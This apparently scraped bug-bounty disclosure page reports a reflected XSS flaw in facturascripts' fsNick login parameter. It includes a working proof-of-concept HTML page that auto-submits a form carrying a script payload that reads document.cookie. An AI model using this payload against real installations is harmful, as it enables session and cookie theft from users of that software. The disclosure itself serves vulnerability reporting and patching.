Lucene search

K
huntrMinhnb11DA4BBBFD-501F-4C7E-BE83-47778103CB59
HistoryApr 27, 2022 - 7:52 a.m.

Refelect XSS in facturascripts

2022-04-2707:52:02
minhnb11
www.huntr.dev
11
xss
facturascripts
vulnerability
fsnick parameter
proof of concept
bugbounty

EPSS

0.001

Percentile

30.0%

Description

facturascripts is vulnerable to XSS in fsNick parameter

Proof of Concept

save this code as poc.html

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost/" method="POST">
      <input type="hidden" name="fsNick" value="1'"()&%<acx><ScRiPt >alert(document.cookie)</ScRiPt>" />
      <input type="hidden" name="fsPassword" value="1" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

open file with your browser -> xss trigger

EPSS

0.001

Percentile

30.0%

Related for DA4BBBFD-501F-4C7E-BE83-47778103CB59